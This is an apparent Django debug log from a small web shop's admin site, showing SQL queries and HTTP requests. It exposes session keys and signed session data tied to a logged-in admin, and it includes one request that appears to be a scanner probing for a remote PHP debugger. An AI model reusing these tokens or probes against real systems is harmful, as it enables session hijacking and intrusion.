9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:42:59] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 09:44:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 09:44:47,391 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:44:47,396 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:44:47,398 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:44:47,400 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:44:47,402 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:44:47,404 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:44:47,407 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:44:47,409 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:44:47,411 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:44:47,413 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:44:47,415 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:44:47] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 09:49:12] "GET / HTTP/1.0" 302 0 [09/Dec/2019 09:51:24] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-09 09:51:24,600 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tuz3uiyrzivcc9rm7in1ltvueyhdkjyc' LIMIT 1; args=('tuz3uiyrzivcc9rm7in1ltvueyhdkjyc',) DEBUG 2019-12-09 09:51:24,603 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tuz3uiyrzivcc9rm7in1ltvueyhdkjyc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T09:51:24.601522+00:00'::timestamptz); args=('tuz3uiyrzivcc9rm7in1ltvueyhdkjyc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 9, 51, 24, 601522, tzinfo=)) [09/Dec/2019 09:51:24] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 DEBUG 2019-12-09 09:51:52,582 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:51:52.573461+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 51, 52, 573461, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:51:52,585 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 09:51:52,619 utils 32196 139885050582784 (0.007) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-09 09:51:52,627 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T09:51:52.625715+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 9, 51, 52, 625715, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 09:51:52] "GET / HTTP/1.0" 200 8868 [09/Dec/2019 09:51:52] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 DEBUG 2019-12-09 09:51:52,927 utils 32196 139885050582784 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:51:52.916906+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 51, 52, 916906, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:51:52,930 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 09:51:52,963 utils 32196 139885050582784 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-09 09:51:52,972 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T09:51:52.971182+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 9, 51, 52, 971182, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 09:51:52] "GET / HTTP/1.0" 200 8868 [09/Dec/2019 09:51:53] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [09/Dec/2019 09:51:53] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [09/Dec/2019 09:51:53] "GET /static/admin/img/icon-deletelink.svg HTTP/1.0" 200 392 DEBUG 2019-12-09 09:51:57,281 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:51:57.271471+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 51, 57, 271471, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:51:57,283 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 09:51:57,287 utils 32196 139885050582784 (0.003) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-09 09:51:57,288 utils 32196 139885050582784 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-09 09:51:57,293 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-09 09:51:57,391 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T09:51:57.389406+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 9, 51, 57, 389406, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 09:51:57] "GET /shop/category/ HTTP/1.0" 200 6758 DEBUG 2019-12-09 09:51:57,777 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:51:57.767991+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 51, 57, 767991, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:51:57,780 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [09/Dec/2019 09:51:57] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-09 09:52:00,290 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:52:00.280626+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 52, 0, 280626, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:52:00,293 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 09:52:00,321 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T09:52:00.319746+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 9, 52, 0, 319746, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 09:52:00] "GET /shop/ HTTP/1.0" 200 2790 DEBUG 2019-12-09 09:52:02,291 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:52:02.282207+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 52, 2, 282207, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:52:02,293 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 09:52:02,298 utils 32196 139885050582784 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-09 09:52:02,299 utils 32196 139885050582784 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-09 09:52:02,307 utils 32196 139885050582784 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-09 09:52:02,432 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T09:52:02.430507+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 9, 52, 2, 430507, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 09:52:02] "GET /shop/product/ HTTP/1.0" 200 10007 [09/Dec/2019 09:52:02] "GET /static/admin/css/forms.css HTTP/1.0" 304 0 DEBUG 2019-12-09 09:52:02,770 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:52:02.760542+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 52, 2, 760542, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:52:02,773 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [09/Dec/2019 09:52:02] "GET /jsi18n/ HTTP/1.0" 200 3223 [09/Dec/2019 09:52:02] "GET /static/admin/css/widgets.css HTTP/1.0" 304 0 [09/Dec/2019 09:52:03] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 DEBUG 2019-12-09 09:52:05,786 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:52:05.776870+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 52, 5, 776870, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:52:05,788 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 09:52:05,790 utils 32196 139885050582784 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 3; args=(3,) DEBUG 2019-12-09 09:52:05,836 utils 32196 139885050582784 (0.003) DECLARE "_django_curs_139885050582784_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:52:05,900 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T09:52:05.897967+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 9, 52, 5, 897967, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 09:52:05] "GET /shop/product/3/change/ HTTP/1.0" 200 9698 [09/Dec/2019 09:52:06] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 304 0 DEBUG 2019-12-09 09:52:06,195 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T09:52:06.186272+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 9, 52, 6, 186272, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 09:52:06,197 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [09/Dec/2019 09:52:06] "GET /jsi18n/ HTTP/1.0" 200 3223 [09/Dec/2019 09:52:06] "GET /static/admin/js/change_form.js HTTP/1.0" 304 0 [09/Dec/2019 09:52:06] "GET /static/admin/img/tooltag-arrowright.svg HTTP/1.0" 200 280 [09/Dec/2019 09:54:17] "GET / HTTP/1.0" 302 0 [09/Dec/2019 09:59:36] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:07:54] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:25:13] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:30:16] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:39:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 10:39:12,720 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'snw1mvdbel9jns5ecauxrln2d1d7m0ya' LIMIT 1; args=('snw1mvdbel9jns5ecauxrln2d1d7m0ya',) DEBUG 2019-12-09 10:39:12,721 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('snw1mvdbel9jns5ecauxrln2d1d7m0ya', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T10:39:12.720450+00:00'::timestamptz); args=('snw1mvdbel9jns5ecauxrln2d1d7m0ya', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 10, 39, 12, 720450, tzinfo=)) [09/Dec/2019 10:39:12] "GET /login/?next=/ 